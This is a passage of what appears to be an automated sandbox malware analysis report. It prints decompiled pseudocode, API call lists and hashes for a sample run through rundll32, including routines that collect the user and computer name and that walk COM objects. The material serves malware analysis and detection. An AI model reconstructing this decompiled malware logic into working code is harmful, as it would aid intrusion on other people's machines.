										E04A44538( *_t47, _t91, _a8,  *0x4a4d338, _a24);
										_t49 = _t101 + 0x10; // 0x3d04a4c0
										E04A44538( *_t49, _t91, _t99,  *0x4a4d330, _a16);
										E04A48B22(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d04a4c0
									E04A44538( *_t40, _t91, _a8,  *0x4a4d338, _a24);
									_t43 = _t101 + 0x10; // 0x3d04a4c0
									E04A44538( *_t43, _t91, _a8,  *0x4a4d330, _a16);
								}
								if( *_t101 != 0) {
									E04A48B22(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d04a4c0
					_t81 = E04A47DDD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d04a4c0
							E04A4A38F(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E04A48B22(_t100);
						_t98 = _a16;
					}
					E04A48B22(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E04A4A789(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x4a4d33c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}























                                0x04a44b2a
                                0x04a44b33
                                0x04a44b3a
                                0x04a44b3f
                                0x04a44bac
                                0x04a44bb2
                                0x04a44bb7
                                0x04a44bbe
                                0x04a44bc3
                                0x04a44bc8
                                0x04a44d33
                                0x04a44d3a
                                0x04a44d3a
                                0x04a44d3f
                                0x04a44d41
                                0x04a44d41
                                0x04a44d4a
                                0x04a44d4a
                                0x04a44bce
                                0x04a44bda
                                0x04a44d29
                                0x04a44d2c
                                0x00000000
                                0x04a44d2c
                                0x04a44be0
                                0x04a44be5
                                0x04a44be8
                                0x04a44bed
                                0x04a44bf2
                                0x04a44c3b
                                0x04a44c3b
                                0x04a44c4e
                                0x04a44c58
                                0x04a44c5e
                                0x04a44c65
                                0x04a44c6f
                                0x04a44c6f
                                0x04a44c67
                                0x04a44c67
                                0x04a44c67
                                0x04a44c67
                                0x04a44c91
                                0x04a44c99
                                0x04a44cc7
                                0x04a44ccc
                                0x04a44cd3
                                0x04a44cd8
                                0x04a44cdc
                                0x04a44d0e
                                0x04a44cde
                                0x04a44ceb
                                0x04a44cee
                                0x04a44cfe
                                0x04a44d01
                                0x04a44d07
                                0x04a44d07
                                0x04a44c9b
                                0x04a44ca8
                                0x04a44cab
                                0x04a44cbd
                                0x04a44cc0
                                0x04a44cc0
                                0x04a44d18
                                0x04a44d24
                                0x04a44d1a
                                0x04a44d1d
                                0x04a44d1d
                                0x04a44d18
                                0x04a44c91
                                0x00000000
                                0x04a44c58
                                0x04a44c01
                                0x04a44c04
                                0x04a44c0b
                                0x04a44c11
                                0x04a44c14
                                0x04a44c16
                                0x04a44c22
                                0x04a44c25
                                0x04a44c25
                                0x04a44c2b
                                0x04a44c30
                                0x04a44c30
                                0x04a44c36
                                0x00000000
                                0x04a44c36
                                0x04a44b44
                                0x00000000
                                0x04a44b6b
                                0x04a44b6b
                                0x04a44b77
                                0x04a44b8a
                                0x04a44b90
                                0x04a44b98
                                0x00000000
                                0x04a44b98

                                APIs
                                • StrChrA.SHLWAPI(04A49900,0000005F,00000000,00000000,00000104), ref: 04A44B5D
                                • lstrcpy.KERNEL32(?,?), ref: 04A44B8A
                                  • Part of subcall function 04A47B3B: lstrlen.KERNEL32(?,00000000,04E59D18,00000000,04A45142,04E59F3B,?,?,?,?,?,69B25F44,00000005,04A4D00C), ref: 04A47B42
                                  • Part of subcall function 04A47B3B: mbstowcs.NTDLL ref: 04A47B6B
                                  • Part of subcall function 04A47B3B: memset.NTDLL ref: 04A47B7D
                                  • Part of subcall function 04A44538: lstrlenW.KERNEL32(?,?,?,04A44CF3,3D04A4C0,80000002,04A49900,04A45C8D,74666F53,4D4C4B48,04A45C8D,?,3D04A4C0,80000002,04A49900,?), ref: 04A4455D
                                  • Part of subcall function 04A48B22: RtlFreeHeap.NTDLL(00000000,00000000,04A4131A,00000000,?,?,00000000), ref: 04A48B2E
                                • lstrcpy.KERNEL32(?,00000000), ref: 04A44BAC
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                • String ID: ($\
                                • API String ID: 3924217599-1512714803
                                • Opcode ID: 5a032c88ffa9ae69a11cd05c760f16c6e3b31d6623f064b555c862d4ebb0dce0
                                • Instruction ID: 23ef1b6fe48c16521cf43a1d5eb16383c7fb56dbd50a3b1f964b94ad1ea6ce3a
                                • Opcode Fuzzy Hash: 5a032c88ffa9ae69a11cd05c760f16c6e3b31d6623f064b555c862d4ebb0dce0
                                • Instruction Fuzzy Hash: F2512A79100209BFEF11AFA0ED40EAE77B9FBD8315F008558F91596160D73AF9669B10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A49FF6, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E04A49FF6() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x4a4d32c; // 0x4e595b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x4a4d32c; // 0x4e595b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x4a4d32c; // 0x4e595b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x4a4e81a) {
					HeapFree( *0x4a4d238, 0, _t10);
					_t7 =  *0x4a4d32c; // 0x4e595b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                0x04a49ff6
                                0x04a49fff
                                0x04a4a00f
                                0x04a4a00f
                                0x04a4a014
                                0x04a4a019
                                0x00000000
                                0x00000000
                                0x04a4a009
                                0x04a4a009
                                0x04a4a01b
                                0x04a4a020
                                0x04a4a024
                                0x04a4a037
                                0x04a4a03d
                                0x04a4a03d
                                0x04a4a046
                                0x04a4a048
                                0x04a4a04c
                                0x04a4a052

                                APIs
                                • RtlEnterCriticalSection.NTDLL(04E59570), ref: 04A49FFF
                                • Sleep.KERNEL32(0000000A,?,04A430F3), ref: 04A4A009
                                • HeapFree.KERNEL32(00000000,?,?,04A430F3), ref: 04A4A037
                                • RtlLeaveCriticalSection.NTDLL(04E59570), ref: 04A4A04C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID: Ut
                                • API String ID: 58946197-8415677
                                • Opcode ID: e9174fae930497f59982df252a9b05a226d64cc66c3beb73351737a46006c3e2
                                • Instruction ID: 5bf82388a9fab8bc871d876dfa93362cb15b7870a1ef10ee8cb5f85910565fdd
                                • Opcode Fuzzy Hash: e9174fae930497f59982df252a9b05a226d64cc66c3beb73351737a46006c3e2
                                • Instruction Fuzzy Hash: 0FF0D47C7411009BF7188F64E849E2D77E4EBE8750B058008E906DB650D73EFC02DA20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A49267, Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04A49267() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E04A41525(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E04A48B22(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x4a49cb2
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                0x04a49275
                                0x04a49278
                                0x04a4927b
                                0x04a49281
                                0x04a49286
                                0x04a4928c
                                0x04a49294
                                0x04a49297
                                0x04a4929d
                                0x04a492a2
                                0x04a492af
                                0x04a492bc
                                0x04a492c0
                                0x04a492c2
                                0x04a492c6
                                0x04a492c9
                                0x04a492d9
                                0x04a4932c
                                0x04a4932d
                                0x04a492db
                                0x04a492e0
                                0x04a492e1
                                0x04a492e6
                                0x04a492e9
                                0x04a492fc
                                0x00000000
                                0x04a492fe
                                0x04a49301
                                0x04a49306
                                0x04a49314
                                0x04a49317
                                0x04a4931d
                                0x04a49322
                                0x00000000
                                0x04a49324
                                0x04a49324
                                0x04a49327
                                0x04a49327
                                0x04a49322
                                0x04a492fc
                                0x04a49332
                                0x04a49333
                                0x04a492a2
                                0x04a49339

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,04A49CB0), ref: 04A4927B
                                • GetComputerNameW.KERNEL32(00000000,04A49CB0), ref: 04A49297
                                  • Part of subcall function 04A41525: RtlAllocateHeap.NTDLL(00000000,00000000,04A41278), ref: 04A41531
                                • GetUserNameW.ADVAPI32(00000000,04A49CB0), ref: 04A492D1
                                • GetComputerNameW.KERNEL32(04A49CB0,?), ref: 04A492F4
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04A49CB0,00000000,04A49CB2,00000000,00000000,?,?,04A49CB0), ref: 04A49317
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                • String ID:
                                • API String ID: 3850880919-0
                                • Opcode ID: 43501d7265e021c33073a8585374a6fdddea8aafed176017eba26a8d17b7171b
                                • Instruction ID: e4d774e6575d4f136d5723e56e0aeadda9ba099362b830afd1f8510c7729316e
                                • Opcode Fuzzy Hash: 43501d7265e021c33073a8585374a6fdddea8aafed176017eba26a8d17b7171b
                                • Instruction Fuzzy Hash: F221C5B6900208EFDB11DFE8D9889EFBBBCEBD5304B5044AAE502E7240D634AB55DB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A49EBB, Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04A49EBB(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x4a4d26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x4a4d25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x4a4d258 = _t6;
					 *0x4a4d264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x4a4d254 = _t7;
					if(_t7 == 0) {
						 *0x4a4d254 =  *0x4a4d254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                0x04a49ec3
                                0x04a49ec9
                                0x04a49ed0
                                0x00000000
                                0x04a49f2a
                                0x04a49ed2
                                0x04a49eda
                                0x04a49ee7
                                0x04a49ee7
                                0x04a49f27
                                0x00000000
                                0x04a49f27
                                0x04a49ee9
                                0x04a49ee9
                                0x04a49eee
                                0x04a49f00
                                0x04a49f05
                                0x04a49f0b
                                0x04a49f11
                                0x04a49f18
                                0x04a49f1a
                                0x04a49f1a
                                0x00000000
                                0x04a49f21
                                0x04a49ee3
                                0x00000000
                                0x00000000
                                0x04a49ee5
                                0x00000000

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04A427C3,?,?,00000001,?,?,?,04A47F25,?), ref: 04A49EC3
                                • GetVersion.KERNEL32(?,00000001,?,?,?,04A47F25,?), ref: 04A49ED2
                                • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,04A47F25,?), ref: 04A49EEE
                                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,04A47F25,?), ref: 04A49F0B
                                • GetLastError.KERNEL32(?,00000001,?,?,?,04A47F25,?), ref: 04A49F2A
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                • String ID:
                                • API String ID: 2270775618-0
                                • Opcode ID: 71ac30f0f4b726a32828a0151362f4071eafe2e33ba45dba3474cf0e6edc81bf
                                • Instruction ID: 1fcd24bbcf6d4f2f3d39e4350d20209293b84c7f005dbb666b84248f57400204
                                • Opcode Fuzzy Hash: 71ac30f0f4b726a32828a0151362f4071eafe2e33ba45dba3474cf0e6edc81bf
                                • Instruction Fuzzy Hash: 16F0C8B86413029BF7248F74A819B1F3BA8E7E0711F100916E546CA1C0E77FE813CB25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A44E05, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 46%
                                			E04A44E05(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x4a4d2a8; // 0x40a5a8
					_t5 = _t103 + 0x4a4e038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x4a4c290);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x4a4d2a8; // 0x40a5a8
												_t28 = _t109 + 0x4a4e0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x4a4d2a8; // 0x40a5a8
														_t33 = _t79 + 0x4a4e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}





































                                0x04a44e0a
                                0x04a44e13
                                0x04a44e14
                                0x04a44e18
                                0x04a44e1e
                                0x04a44e24
                                0x04a44e2d
                                0x04a44e33
                                0x04a44e3d
                                0x04a44e3f
                                0x04a44e45
                                0x04a44e4a
                                0x04a44e55
                                0x04a44e5b
                                0x04a44e60
                                0x04a44f82
                                0x04a44e66
                                0x04a44e66
                                0x04a44e73
                                0x04a44e79
                                0x04a44e7f
                                0x04a44e83
                                0x04a44e89
                                0x04a44e96
                                0x04a44e9a
                                0x04a44ea0
                                0x04a44ea3
                                0x04a44eab
                                0x04a44eac
                                0x04a44eb0
                                0x04a44eb4
                                0x04a44eb7
                                0x04a44eba
                                0x04a44ec0
                                0x04a44ec9
                                0x04a44ecf
                                0x04a44ed0
                                0x04a44ed3
                                0x04a44ed4
                                0x04a44ed5
                                0x04a44edd
                                0x04a44ede
                                0x04a44edf
                                0x04a44ee1
                                0x04a44ee5
                                0x04a44ee9
                                0x00000000
                                0x00000000
                                0x04a44eef
                                0x04a44ef8
                                0x04a44efe
                                0x04a44f08
                                0x04a44f0c
                                0x04a44f0e
                                0x04a44f1b
                                0x04a44f1f
                                0x04a44f27
                                0x04a44f2c
                                0x04a44f3e
                                0x04a44f40
                                0x04a44f46
                                0x04a44f46
                                0x04a44f4f
                                0x04a44f4f
                                0x04a44f51
                                0x04a44f57
                                0x04a44f57
                                0x04a44f5a
                                0x04a44f60
                                0x04a44f63
                                0x04a44f6c
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04a44f6c
                                0x04a44ec0
                                0x04a44eba
                                0x04a44ea3
                                0x04a44f72
                                0x04a44f72
                                0x04a44f78
                                0x04a44f78
                                0x04a44f7e
                                0x04a44f7e
                                0x04a44f87
                                0x04a44f8d
                                0x04a44f8d
                                0x04a44e4a
                                0x04a44f96

                                APIs
                                • SysAllocString.OLEAUT32(04A4C290), ref: 04A44E55
                                • lstrcmpW.KERNEL32(00000000,0076006F), ref: 04A44F36
                                • SysFreeString.OLEAUT32(00000000), ref: 04A44F4F
                                • SysFreeString.OLEAUT32(?), ref: 04A44F7E
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: String$Free$Alloclstrcmp
                                • String ID:
                                • API String ID: 1885612795-0
                                • Opcode ID: 3587d354f474e15ddf86f084c4e10a6e63fcc87d12f9fdffa882a0115a228cca
                                • Instruction ID: b61016c1433ed8f884fcf3f1c50a86f3ab799f2c2a2fb5c546469245cb351443
                                • Opcode Fuzzy Hash: 3587d354f474e15ddf86f084c4e10a6e63fcc87d12f9fdffa882a0115a228cca
                                • Instruction Fuzzy Hash: 7F514B75D00509EFCB00DFA8C9889AEF7B9FFC8705B158584E915EB254D732AD42CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A4137B, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(?), ref: 04A413B6
                                • SysFreeString.OLEAUT32(00000000), ref: 04A4149B
                                  • Part of subcall function 04A44E05: SysAllocString.OLEAUT32(04A4C290), ref: 04A44E55
                                • SafeArrayDestroy.OLEAUT32(00000000), ref: 04A414EE
                                • SysFreeString.OLEAUT32(00000000), ref: 04A414FD
                                  • Part of subcall function 04A452B9: Sleep.KERNEL32(000001F4), ref: 04A45301
                                Memory Dump Source
                                • Source File: 00000004.00000002.798189537.0000000004A41000.00000020.00020000.sdmp, Offset: 04A40000, based on PE: true
                                • Associated: 00000004.00000002.798169194.0000000004A40000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798218094.0000000004A4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798230640.0000000004A4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000004.00000002.798247965.0000000004A4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                Similarity
                                • API ID: String$AllocFree$ArrayDestroySafeSleep
                                • String ID:
                                • API String ID: 3193056040-0
                                • Opcode ID: 5224b0404dfc273c842d6871e013efb4fa4c3774b152328b9d3c7e10cbd05ad5
                                • Instruction ID: e8dfdfc2ff2aeb14357a543d63796131efea4778a4e1886cd91abccfa9d78813
                                • Opcode Fuzzy Hash: 5224b0404dfc273c842d6871e013efb4fa4c3774b152328b9d3c7e10cbd05ad5
                                • Instruction Fuzzy Hash: 9C519E75900609AFDB01CFA8C948A9EB7B6FFC8710B158829E909DB210DB71ED46CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04A429ED, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                Download Yara Rule
                                C-Code - Quality: 85%
                                			E04A429ED(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E04A48B37(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E04A44AA4(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04A42F01(_t101,  &_v236, _a8, _t96 - _t81);
					E04A42F01(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E04A44AA4(_t101, 0x4a4d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E04A44AA4(_a16, _a4);
						E04A428BA(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L04A4AF6E();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L04A4AF68();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E04A49947(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E04A44506(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E04A4A708(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x4a4d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                0x04a429f0
                                0x04a429fc
                                0x04a42a02
                                0x04a42a07
                                0x04a42a0b
                                0x04a42b68
                                0x04a42b6c
                                0x04a42b6c
                                0x04a42a11
                                0x04a42a15
                                0x04a42a19
                                0x04a42a1c
                                0x04a42a27
                                0x04a42a2d
                                0x04a42a32
                                0x04a42a35
                                0x04a42a4f
                                0x04a42a5b
                                0x04a42a64
                                0x04a42a6e
                                0x04a42a73
                                0x04a42a75
                                0x04a42a78
                                0x04a42b26
                                0x04a42b2c
                                0x04a42b3d
                                0x04a42b50
                                0x04a42b60
                                0x00000000
                                0x04a42b65
                                0x04a42a81
                                0x04a42a88
                                0x04a42a8c
                                0x04a42a92
                                0x04a42a94
                                0x04a42a96
                                0x04a42a98
                                0x04a42a9a
                                0x04a42aa4
                                0x04a42aa9
                                0x04a42aab
                                0x04a42aad
                                0x04a42aae
                                0x04a42aaf
                                0x04a42ab0
                                0x04a42ab7
                                0x04a42abe
                                0x04a42ac1
                                0x04a42ac1
                                0x04a42a8e
                                0x04a42a8e
                                0x04a42a8e
                                0x04a42ac9
                                0x04a42ad1
                                0x04a42ada
                                0x04a42adf
                                0x04a42adf
                                0x04a42ae4
                                0x00000000
                                0x00000000
                                0x04a42ae6
                                0x04a42ae9
                                0x04a42af3
                                0x00000000
                                0x00000000
                                0x04a42af5
                                0x04a42af5
                                0x04a42aff
                                0x04a42adf
                                0x04a42ae4
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04a42ae4
                                0x04a42b09
                                0x04a42b0c
                                0x04a42b0f
                                0x04a42b16
                                0x04a42b16
                                0x04a42b23
                                0x00000000
                                0x04a42b23
                                0x04a42a1e
                                0x04a42a22
                                0x04a42a23
                                0x04a42a25
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04a42a25
                                0x00000000

                                APIs
